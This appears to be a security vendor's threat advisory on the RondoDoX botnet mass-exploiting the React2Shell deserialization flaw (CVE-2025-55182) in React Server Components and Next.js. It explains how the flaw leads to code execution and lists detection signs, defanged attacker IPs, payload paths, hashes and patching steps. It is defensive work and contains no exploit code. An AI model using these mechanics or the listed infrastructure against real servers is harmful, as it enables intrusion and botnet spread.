top of page

RondoDoX Botnet Weaponizes React2Shell (CVE-2025-55182) for Mass Exploitation of React and Next.js Infrastructure

January 6th, 2026

Critical

Our Cyber Threat Intelligence Unit is monitoring an active exploitation campaign attributed to the RondoDoX botnet that is abusing CVE-2025-55182 (React2Shell), a critical remote code execution (RCE) vulnerability in React Server Components (RSC). This campaign reflects a continued pattern of real-world exploitation of React2Shell (as seen in our December 8th, 2025 advisory), which highlights the operational impact and ease of weaponization associated with this vulnerability. Following public disclosure in early December 2025, threat actors rapidly operationalized the vulnerability to achieve unauthenticated server-side code execution via maliciously crafted HTTP POST requests. RondoDoX exploits unsafe deserialization in React’s Flight protocol to compromise vulnerable Next.js App Router and RSC deployments, enabling the automated deployment of cryptominers, Mirai-based malware, and botnet loaders at scale. Given the breadth of exposure across internet-facing infrastructure and the high reliability of the exploit chain, this activity poses severe operational risks to organizations and requires urgent remediation and enhanced monitoring. 

Technical Details

  • Threat Name: RondoDoX Botnet – React2Shell Weaponization

  • CVE ID: CVE-2025-55182

  • CVSS Score: 10.0 (Critical)

  • Attack Type: Automated Mass Exploitation, Botnet Propagation, Malware Distribution

  • Vulnerable Components / Libraries include:

    • react-server-dom-webpack

    • react-server-dom-parcel

    • react-server-dom-turbopack

  • Vulnerability Root Cause:

    • RondoDoX exploits unsafe deserialization in React’s Flight protocol, abusing the same logical issue underlying CVE-2025-55182.

    • Improper validation in the requireModule function within react-server-dom-webpack allows attacker-supplied payloads to be interpreted as executable server-side JavaScript.

      • This results in arbitrary code execution with the privileges of the Node.js process.

Attack Vector & Exploitation Mechanics:

  • Initial Access Vector: Automated scanning of exposed React Server Component endpoints, followed by delivery of malformed HTTP POST payloads.

  • Exploitation Method: Malicious Flight protocol payloads manipulate module resolution logic in React Server Components, coercing the server to invoke vm.runInThisContext() on attacker-controlled input.

  • Payload Retrieval & Execution: Upon successful exploitation, compromised systems retrieve secondary payloads from attacker-controlled infrastructure using tools such as wget, curl, or tftp.

  • Post-Compromise Behavior Includes:

    • Cryptominer deployment

    • Botnet loader installation

    • “Health-check” binaries removing competing malware

    • Mirai-derived malware variants

      • These actions facilitate persistence, resource hijacking, botnet enrollment, and malware propagation.

Because this vulnerability relies on deterministic logic rather than memory corruption, exploitation remains high-reliability and well-suited for automated mass scanning and compromise.

Image by ThisisEngineering

Impact

  • Active Infrastructure Compromise: Widespread exploitation of Next.js servers and exposed RSC deployments, with potential for complete system takeover.

  • Botnet Expansion: Compromised systems are enrolled into the RondoDoX botnet, increasing adversary computing capacity and operational reach.

  • Malware & Resource Hijacking: Cryptominers and malware degrade system performance, availability, and security posture.

  • Global Exposure: Shadowserver telemetry indicates tens of thousands of internet-accessible instances remain vulnerable.

Detection Method

Organizations should monitor for indicators of exploitation, including:

  • Suspicious or malformed HTTP POST requests targeting RSC or Server Action endpoints

  • Unexpected Node.js child processes

  • File creation in /tmp or /var/tmp

  • Outbound connections from web servers to unknown or newly observed IP addresses

  • Downloads initiated using wget / curl / tftp

  • Serialized Flight payloads exhibiting anomalous structure or length

Indicators of Compromise

IP Address 

74[.]194[.]191[.]52 

70[.]184[.]13[.]47 

41[.]231[.]37[.]153 

5[.]255[.]121[.]141 

89[.]144[.]31[.]18 

51[.]81[.]104[.]115 

5[.]231[.]70[.]66 

95[.]214.52.170 

89[.]144.31.18 

37[.]114.37.94 

37[.]114.37.82 

 

Observed Payload Paths: 

Description 

/nuts/poop  

 Cryptominer payload 

/nuts/bolts 

Botnet loader / health-checker 

/nuts/x86 

Mirai-variant payload 

 

Hash 

895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b 

8e0bc23a87d349e5a5356252ce17576093b7858fdf6ea84919fbdcb2e117168e  

50be5257678412f0810d46e0b0bc573eb65c6ce4617346c1527ff0dc9b7fc79e  

858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb  


mix of red, purple, orange, blue bubble shape waves horizontal for cybersecurity and netwo

Recommendations

  • Patch Immediately: Upgrade all React Server Component packages and affected Next.js App Router deployments to versions addressing CVE-2025-55182.

  • Restrict Exposure: Apply network segmentation, reverse proxy controls, and firewall policy enforcement to limit RSC endpoint accessibility.

  • Enhance Runtime Visibility: Deploy monitoring capable of detecting Node.js execution anomalies and unauthorized process activity.

  • Block Known Infrastructure: Add identified RondoDoX-associated IPs and domains to network-level deny lists.

  • Audit & Rebuild Where Necessary: Inspect impacted systems, remove malicious artifacts, and perform clean redeployment if compromise is confirmed or suspected.

Conclusion

The RondoDoX botnet has fully operationalized CVE-2025-55182 (React2Shell) as its primary attack vector for mass-compromising React and Next.js infrastructure. The scale, automation, and reliability of the exploit chain significantly increase operational risk. We urge organizations to treat this as a critical security event and prioritize patching, hardening, IOC-driven threat hunting, and continuous monitoring to prevent sustained compromise and mitigate risks associated with this ongoing campaign.

bottom of page